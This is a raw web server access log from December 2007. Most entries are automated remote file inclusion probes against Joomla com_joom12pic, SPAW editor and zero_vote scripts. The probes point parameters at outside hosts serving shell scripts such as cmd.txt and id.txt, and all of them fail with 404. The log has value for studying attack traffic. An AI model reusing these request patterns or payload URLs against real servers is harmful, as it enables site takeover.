89.111.176.102 - - [15/Dec/2007:09:21:13 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.miladyparis.com/MILADY/images/articles/mini/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.102 - - [15/Dec/2007:09:21:14 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.miladyparis.com/MILADY/images/articles/mini/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.114.5 - - [15/Dec/2007:09:22:07 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.114.5 - - [15/Dec/2007:09:22:07 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.114.5 - - [15/Dec/2007:09:22:07 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.114.5 - - [15/Dec/2007:09:22:07 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.74.145 - - [15/Dec/2007:09:22:12 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.123.207.130 - - [15/Dec/2007:09:22:28 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.102 - - [15/Dec/2007:09:23:29 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.berbervandenberg.nl/gb/files/scan/id.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.102 - - [15/Dec/2007:09:23:30 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.berbervandenberg.nl/gb/files/scan/id.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.102 - - [15/Dec/2007:09:23:30 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.berbervandenberg.nl/gb/files/scan/id.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.102 - - [15/Dec/2007:09:23:31 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.berbervandenberg.nl/gb/files/scan/id.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.22.86.11 - - [15/Dec/2007:09:24:19 -0800] "GET /logs/access_071202.log/editor2/spaw_control.class.php?spaw_root=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.22.86.11 - - [15/Dec/2007:09:24:19 -0800] "GET /editor2/spaw_control.class.php?spaw_root=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.22.86.11 - - [15/Dec/2007:09:24:19 -0800] "GET /logs/editor2/spaw_control.class.php?spaw_root=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.56.188 - - [15/Dec/2007:09:24:26 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.188 - - [15/Dec/2007:09:24:26 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.70.112.3 - - [15/Dec/2007:09:25:05 -0800] "GET /logs/access_071207.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.112.3 - - [15/Dec/2007:09:25:34 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.123.207.130 - - [15/Dec/2007:09:25:49 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.167.242 - - [15/Dec/2007:09:26:27 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://punkoholic-squad.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.98.145.127 - - [15/Dec/2007:09:26:43 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.98.145.127 - - [15/Dec/2007:09:26:43 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [15/Dec/2007:09:26:47 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://my3dwork.com/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [15/Dec/2007:09:26:47 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://my3dwork.com/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [15/Dec/2007:09:26:48 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://my3dwork.com/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [15/Dec/2007:09:26:48 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://my3dwork.com/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [15/Dec/2007:09:27:03 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://my3dwork.com/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [15/Dec/2007:09:27:04 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://my3dwork.com/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [15/Dec/2007:09:27:04 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://my3dwork.com/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [15/Dec/2007:09:27:04 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://my3dwork.com/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.249.135.5 - - [15/Dec/2007:09:27:20 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kamloopstutor.com/images/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.71.158 - - [15/Dec/2007:09:27:20 -0800] "GET /logs/access_071207.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.e-baise.com/temp/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.98.145.127 - - [15/Dec/2007:09:27:25 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.98.145.127 - - [15/Dec/2007:09:27:31 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.121.71.158 - - [15/Dec/2007:09:28:06 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.e-baise.com/temp/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.240.23.51 - - [15/Dec/2007:09:28:55 -0800] "GET /logs/access_071126.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.240.23.51 - - [15/Dec/2007:09:29:20 -0800] "GET /logs/access_071126.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.123.207.130 - - [15/Dec/2007:09:29:23 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [15/Dec/2007:09:30:07 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [15/Dec/2007:09:30:07 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [15/Dec/2007:09:30:07 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [15/Dec/2007:09:30:07 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.249.135.5 - - [15/Dec/2007:09:31:07 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kamloopstutor.com/images/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.249.135.5 - - [15/Dec/2007:09:31:08 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kamloopstutor.com/images/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.249.135.5 - - [15/Dec/2007:09:31:29 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kamloopstutor.com/images/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.167.242 - - [15/Dec/2007:09:31:36 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hajiabbas.com/test1/images/gallery2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.123.207.130 - - [15/Dec/2007:09:31:39 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.167.242 - - [15/Dec/2007:09:32:23 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://punkoholic-squad.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.167.242 - - [15/Dec/2007:09:32:23 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://punkoholic-squad.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.167.242 - - [15/Dec/2007:09:32:47 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://punkoholic-squad.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.236.47.176 - - [15/Dec/2007:09:33:20 -0800] "GET /logs/access_071207.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ourcolemanfamily.com/genealogy/headstones/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.93.5.130 - - [15/Dec/2007:09:33:50 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.93.5.130 - - [15/Dec/2007:09:33:53 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.47.176 - - [15/Dec/2007:09:34:04 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ourcolemanfamily.com/genealogy/headstones/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.93.5.130 - - [15/Dec/2007:09:34:04 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.66.146.133 - - [15/Dec/2007:09:34:38 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://dballen.com/sohoadmin/license.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.225 - - [15/Dec/2007:09:35:04 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.85.167.242 - - [15/Dec/2007:09:36:14 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hajiabbas.com/test1/images/gallery2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.167.242 - - [15/Dec/2007:09:36:14 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hajiabbas.com/test1/images/gallery2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.167.242 - - [15/Dec/2007:09:36:39 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hajiabbas.com/test1/images/gallery2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.70.112.3 - - [15/Dec/2007:09:36:55 -0800] "GET /logs/access_071202.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.112.3 - - [15/Dec/2007:09:36:55 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.112.3 - - [15/Dec/2007:09:36:55 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.186.136.139 - - [15/Dec/2007:09:40:54 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.186.136.139 - - [15/Dec/2007:09:40:55 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.186.136.139 - - [15/Dec/2007:09:40:55 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.186.136.139 - - [15/Dec/2007:09:41:33 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.186.136.139 - - [15/Dec/2007:09:41:34 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.186.136.139 - - [15/Dec/2007:09:41:35 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.186.136.139 - - [15/Dec/2007:09:41:38 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.186.136.139 - - [15/Dec/2007:09:42:19 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.249.135.5 - - [15/Dec/2007:09:42:22 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kamloopstutor.com/images/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.249.135.5 - - [15/Dec/2007:09:42:23 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kamloopstutor.com/images/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.227 - - [15/Dec/2007:09:42:36 -0800] "GET /logs/access_070916.log HTTP/1.0" 200 144658 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.84.245.36 - - [15/Dec/2007:09:43:05 -0800] "GET /logs/access_071202.log//skin/zero_vote/error.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.84.245.36 - - [15/Dec/2007:09:43:05 -0800] "GET /logs/access_071202.log//skin/zero_vote/setup.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.84.245.36 - - [15/Dec/2007:09:43:05 -0800] "GET //skin/zero_vote/error.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.84.245.36 - - [15/Dec/2007:09:43:05 -0800] "GET //skin/zero_vote/setup.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.84.245.36 - - [15/Dec/2007:09:43:05 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.84.245.36 - - [15/Dec/2007:09:43:05 -0800] "GET /logs//skin/zero_vote/setup.php?dir=http://mis.mju.ac.kr/~jandi/bbs/icon/ascid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.52.143.16 - - [15/Dec/2007:09:45:18 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
81.52.143.16 - - [15/Dec/2007:09:45:24 -0800] "GET /presto/?D=A HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
216.70.112.3 - - [15/Dec/2007:09:46:19 -0800] "GET /logs/access_071202.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.112.3 - - [15/Dec/2007:09:46:19 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.112.3 - - [15/Dec/2007:09:46:19 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.167.242 - - [15/Dec/2007:09:47:13 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://punkoholic-squad.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.167.242 - - [15/Dec/2007:09:47:13 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://punkoholic-squad.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.167.242 - - [15/Dec/2007:09:49:08 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hajiabbas.com/test1/images/gallery2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.167.242 - - [15/Dec/2007:09:49:08 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hajiabbas.com/test1/images/gallery2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.167 - - [15/Dec/2007:09:49:59 -0800] "GET /minamijewelry/html/bird.html HTTP/1.0" 200 20962 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.186.136.139 - - [15/Dec/2007:09:51:41 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anyeparts.com/dataBackup/1075801835/id?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.156 - - [15/Dec/2007:09:54:48 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
